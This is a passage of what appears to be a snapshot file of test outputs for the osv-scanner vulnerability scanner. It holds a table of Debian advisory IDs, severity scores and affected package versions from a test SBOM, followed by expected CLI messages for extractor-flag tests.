| 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2016-3709 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-2309 | | | | | | | | https://osv.dev/DLA-3878-1 | | | | | | | | https://osv.dev/DEBIAN-CVE-2016-9318 | 5.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-0663 | 7.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-15412 | 8.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-16931 | 9.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-16932 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-18258 | 6.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | 
https://osv.dev/DEBIAN-CVE-2017-5130 | 8.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-5969 | 4.7 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-7375 | 9.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-7376 | 9.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-8872 | 9.1 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-9047 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-9048 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-9049 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-9050 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-14404 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-14567 | 6.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2019-19956 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2019-20388 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2020-7595 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | 
testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2021-3516 | 7.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2021-3517 | 8.6 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2021-3518 | 8.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2021-3537 | 5.9 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2021-3541 | 6.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-23308 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-9714 | 5.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-4319-1 | | | | | | | | https://osv.dev/DEBIAN-CVE-2026-0989 | 3.7 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2026-0990 | 5.9 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2026-0992 | 2.9 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4539-1 | 4.7 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4539-3 | | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4661-1 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4807-1 | 5.9 | Debian | openssl | 
1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4855-1 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4875-1 | 5.9 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4963-1 | 9.8 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5103-1 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5139-1 | 7.3 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5169-1 | 7.3 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5343-1 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5417-1 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5532-1 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5764-1 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-6015-1 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-6113-1 | 9.8 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-0732 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-0734 | 5.9 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-0735 | 5.9 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | 
testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-5407 | 4.7 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2019-1543 | 7.4 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2019-1549 | 5.3 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2021-3450 | 7.4 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-2274 | 9.8 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-3358 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-3602 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-3786 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-3996 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-4203 | 4.9 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-0216 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-0217 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-0401 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-1255 | 5.9 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | 
https://osv.dev/DEBIAN-CVE-2023-2975 | 5.3 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-3446 | 5.3 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-3817 | | | | | | | | https://osv.dev/DLA-3530-1 | | | | | | | | https://osv.dev/DEBIAN-CVE-2023-5678 | 9.1 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2024-0727 | | | | | | | | https://osv.dev/DEBIAN-CVE-2024-2511 | | | | | | | | https://osv.dev/DEBIAN-CVE-2024-4741 | | | | | | | | https://osv.dev/DEBIAN-CVE-2024-5535 | | | | | | | | https://osv.dev/DEBIAN-CVE-2024-9143 | | | | | | | | https://osv.dev/DLA-3942-1 | | | | | | | | https://osv.dev/DLA-3942-2 | | | | | | | | https://osv.dev/DEBIAN-CVE-2023-6129 | 6.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-6237 | 5.9 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2024-12797 | 6.3 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2024-13176 | 4.1 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-4176-1 | | | | | | | | https://osv.dev/DEBIAN-CVE-2024-4603 | 5.3 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-11187 | 6.1 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-15468 | 5.9 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-15469 | 5.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | 
testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-4575 | 6.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-66199 | 5.9 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-9231 | 6.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2026-2673 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5902-1 | 8.4 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-12837 | 7.5 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-12883 | 9.1 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-12015 | 7.5 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-18311 | 9.8 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-18312 | 9.8 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-18313 | 9.1 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-18314 | 9.8 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-6797 | 9.8 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-6798 | 7.5 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | 
https://osv.dev/DEBIAN-CVE-2018-6913 | 9.8 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2020-10543 | 8.2 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2020-10878 | 8.6 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2020-12723 | 7.5 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2020-16156 | 8.1 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-31484 | | | | | | | | https://osv.dev/DLA-3926-1 | | | | | | | | https://osv.dev/DEBIAN-CVE-2021-36770 | 7.8 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-47038 | 7.8 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-40909 | 5.9 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5135-1 | | Debian | postgresql-11 | 11.15-1.pgdg90+1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3072-1 | | Debian | postgresql-11 | 11.15-1.pgdg90+1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3189-1 | | Debian | postgresql-11 | 11.15-1.pgdg90+1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3316-1 | | Debian | postgresql-11 | 11.15-1.pgdg90+1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3422-1 | | Debian | postgresql-11 | 11.15-1.pgdg90+1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3600-1 | | Debian | postgresql-11 | 11.15-1.pgdg90+1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | 
https://osv.dev/DLA-3651-1 | | Debian | postgresql-11 | 11.15-1.pgdg90+1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3764-1 | | Debian | postgresql-11 | 11.15-1.pgdg90+1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-17512 | 8.8 | Debian | sensible-utils | 0.0.9+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-20482 | 4.7 | Debian | tar | 1.29b-1.1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-39804 | 6.2 | Debian | tar | 1.29b-1.1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3755-1 | | | | | | | | https://osv.dev/DLA-3051-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3134-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3161-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3366-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3412-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3684-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3788-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3972-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-4085-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-4105-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-4403-1 | | Debian | 
tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-4016-1 | | Debian | ucf | 3.0036 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5055-1 | 5.5 | Debian | util-linux | 2.29.2-1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5650-1 | 5.5 | Debian | util-linux | 2.29.2-1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2016-2779 | 7.8 | Debian | util-linux | 2.29.2-1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2026-3184 | | Debian | util-linux | 2.29.2-1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5123-1 | 8.8 | Debian | xz-utils | 5.2.2-1.2+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5895-1 | 8.7 | Debian | xz-utils | 5.2.2-1.2+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2024-3094 | 10.0 | Debian | xz-utils | 5.2.2-1.2+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | +---------------------------------------+------+-----------+--------------------------------+------------------------------------+-----------------------------------+-------------------------------------------------+ --- [TestCommand_Config_UnusedIgnores/unused_ignores_are_reported_with_specific_config_and_multiple_files - 2] --- [TestCommand_ExplicitExtractors_WithDefaults/empty_plugins_flag_does_nothing - 1] --- [TestCommand_ExplicitExtractors_WithDefaults/empty_plugins_flag_does_nothing - 2] Incorrect Usage: flag needs an argument: --experimental-plugins= flag needs an argument: --experimental-plugins= --- [TestCommand_ExplicitExtractors_WithDefaults/extractors_cancelled_out_specified_individually - 1] Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. 
Please ensure you trust the source code and artifacts before proceeding. --- [TestCommand_ExplicitExtractors_WithDefaults/extractors_cancelled_out_specified_individually - 2] No package sources found, --help for usage information. --- [TestCommand_ExplicitExtractors_WithDefaults/extractors_cancelled_out_specified_together - 1] Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. --- [TestCommand_ExplicitExtractors_WithDefaults/extractors_cancelled_out_specified_together - 2] No package sources found, --help for usage information. --- [TestCommand_ExplicitExtractors_WithDefaults/extractors_cancelled_out_with_presets - 1] Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. --- [TestCommand_ExplicitExtractors_WithDefaults/extractors_cancelled_out_with_presets - 2] No package sources found, --help for usage information. --- [TestCommand_ExplicitExtractors_WithDefaults/scanning_directory_with_a_couple_of_specific_extractors_enabled_individually - 1] Scanning dir ./testdata/locks-many Scanned /testdata/locks-many/Gemfile.lock file and found 1 package Scanned /testdata/locks-many/composer.lock file and found 1 package Scanned /testdata/locks-many/package-lock.json file and found 1 package Scanned /testdata/locks-many/yarn.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. 
Loaded filter from: /testdata/locks-many/osv-scanner-test.toml No issues found --- [TestCommand_ExplicitExtractors_WithDefaults/scanning_directory_with_a_couple_of_specific_extractors_enabled_individually - 2] --- [TestCommand_ExplicitExtractors_WithDefaults/scanning_directory_with_a_couple_of_specific_extractors_enabled_specified_together - 1] Scanning dir ./testdata/locks-many Scanned /testdata/locks-many/Gemfile.lock file and found 1 package Scanned /testdata/locks-many/composer.lock file and found 1 package Scanned /testdata/locks-many/package-lock.json file and found 1 package Scanned /testdata/locks-many/yarn.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Loaded filter from: /testdata/locks-many/osv-scanner-test.toml No issues found --- [TestCommand_ExplicitExtractors_WithDefaults/scanning_directory_with_a_couple_of_specific_extractors_enabled_specified_together - 2] --- [TestCommand_ExplicitExtractors_WithDefaults/scanning_directory_with_an_extractor_that_does_not_exist - 1] Scanning dir ./testdata/locks-many Scanned /testdata/locks-many/Gemfile.lock file and found 1 package Scanned /testdata/locks-many/composer.lock file and found 1 package Scanned /testdata/locks-many/package-lock.json file and found 1 package Scanned /testdata/locks-many/yarn.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Loaded filter from: /testdata/locks-many/osv-scanner-test.toml Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 0 ecosystems. 0 vulnerabilities can be fixed. 
--- [TestCommand_ExplicitExtractors_WithDefaults/scanning_directory_with_an_extractor_that_does_not_exist - 2] not an exact name for a plugin: "custom/extractor" --- [TestCommand_ExplicitExtractors_WithDefaults/scanning_directory_with_one_specific_extractor_disabled - 1] Scanning dir ./testdata/locks-many Scanned /testdata/locks-many/Gemfile.lock file and found 1 package Scanned /testdata/locks-many/composer.lock file and found 1 package Scanned /testdata/locks-many/yarn.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Loaded filter from: /testdata/locks-many/osv-scanner-test.toml No issues found --- [TestCommand_ExplicitExtractors_WithDefaults/scanning_directory_with_one_specific_extractor_disabled - 2] --- [TestCommand_ExplicitExtractors_WithDefaults/scanning_directory_with_one_specific_extractor_enabled_and_the_defaults - 1] Scanning dir ./testdata/locks-many Scanned /testdata/locks-many/Gemfile.lock file and found 1 package Scanned /testdata/locks-many/composer.lock file and found 1 package Scanned /testdata/locks-many/package-lock.json file and found 1 package Scanned /testdata/locks-many/yarn.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Loaded filter from: /testdata/locks-many/osv-scanner-test.toml No issues found --- [TestCommand_ExplicitExtractors_WithDefaults/scanning_directory_with_one_specific_extractor_enabled_and_the_defaults - 2] --- [TestCommand_ExplicitExtractors_WithDefaults/scanning_file_with_one_different_extractor_enabled - 1] Scanning dir ./testdata/locks-many/composer.lock Scanned /testdata/locks-many/composer.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. 
Please ensure you trust the source code and artifacts before proceeding. Loaded filter from: /testdata/locks-many/osv-scanner-test.toml No issues found --- [TestCommand_ExplicitExtractors_WithDefaults/scanning_file_with_one_different_extractor_enabled - 2] --- [TestCommand_ExplicitExtractors_WithDefaults/scanning_file_with_one_specific_extractor_enabled - 1] Scanning dir ./testdata/locks-many/package-lock.json Scanned /testdata/locks-many/package-lock.json file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Loaded filter from: /testdata/locks-many/osv-scanner-test.toml No issues found --- [TestCommand_ExplicitExtractors_WithDefaults/scanning_file_with_one_specific_extractor_enabled - 2] --- [TestCommand_ExplicitExtractors_WithDefaults/scanning_file_with_parse_as_but_specific_extractor_disabled - 1] --- [TestCommand_ExplicitExtractors_WithDefaults/scanning_file_with_parse_as_but_specific_extractor_disabled - 2] could not determine extractor, requested package-lock.json --- [TestCommand_ExplicitExtractors_WithoutDefaults/empty_plugins_flag_does_nothing - 1] --- [TestCommand_ExplicitExtractors_WithoutDefaults/empty_plugins_flag_does_nothing - 2] Incorrect Usage: flag needs an argument: --experimental-plugins= flag needs an argument: --experimental-plugins= --- [TestCommand_ExplicitExtractors_WithoutDefaults/extractors_cancelled_out_specified_individually - 1] --- [TestCommand_ExplicitExtractors_WithoutDefaults/extractors_cancelled_out_specified_individually - 2] at least one extractor must be enabled --- [TestCommand_ExplicitExtractors_WithoutDefaults/extractors_cancelled_out_specified_together - 1] --- [TestCommand_ExplicitExtractors_WithoutDefaults/extractors_cancelled_out_specified_together - 2] at least one extractor must be enabled --- [TestCommand_ExplicitExtractors_WithoutDefaults/extractors_cancelled_out_with_presets - 1] --- 
